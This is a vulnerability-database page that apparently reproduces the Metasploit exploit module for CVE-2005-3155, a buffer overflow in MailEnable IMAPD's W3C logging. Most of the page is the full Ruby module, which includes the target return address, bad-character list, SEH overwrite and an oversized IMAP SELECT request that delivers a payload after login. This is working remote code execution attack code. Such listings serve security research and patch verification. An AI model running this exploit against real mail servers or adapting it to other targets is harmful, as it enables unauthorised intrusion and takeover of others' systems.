Lucene search
K

MailEnable IMAPD W3C Logging Buffer Overflow

🗓️ 05 Dec 2005 05:00:27Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 27 Views

MailEnable IMAPD W3C Logging Buffer Overflow in MailEnable IMAPD service allows buffer overflow in W3C logging, affecting MailEnable Professional v1.6 and prior and MailEnable Enterprise v1.1 and prior

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
MailEnable STATUS Command Overflow
4 Oct 200500:00
nessus
Tenable Nessus
MailEnable IMAP Server W3C Logging Overflow
4 Oct 200500:00
nessus
Circl
CVE-2005-3155
15 Jun 201000:00
circl
CVE
CVE-2005-3155
5 Oct 200504:00
cve
Cvelist
CVE-2005-3155
5 Oct 200504:00
cvelist
Exploit DB
MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)
15 Jun 201000:00
exploitdb
NVD
CVE-2005-3155
5 Oct 200523:02
nvd
Packet Storm
MailEnable IMAPD W3C Logging Buffer Overflow
26 Nov 200900:00
packetstorm
Saint
MailEnable IMAP W3C Logging Buffer Overflow
3 Dec 200500:00
saint
Saint
MailEnable IMAP W3C Logging Buffer Overflow
3 Dec 200500:00
saint
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Imap
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MailEnable IMAPD W3C Logging Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in the W3C logging
        functionality of the MailEnable IMAPD service. Logging is
        not enabled by default and this exploit requires a valid
        username and password to exploit the flaw. MailEnable
        Professional version 1.6 and prior and MailEnable Enterprise
        version 1.1 and prior are affected.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-3155'],
          [ 'OSVDB', '19842'],
          [ 'BID', '15006'],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL
        ],
      'DisclosureDate' => '2005-10-03',
      'DefaultTarget' => 0))
  end

  def check
    connect
    disconnect

    if (banner and banner =~ /MailEnable Service, Version: 0-1\.54/)
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect_login

    buf = rand_text_alphanumeric(6196, payload_badchars)
    seh = generate_seh_payload(target.ret)
    req = 'a01 SELECT ' + buf + seh + "\r\n"
    sock.put(req)

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation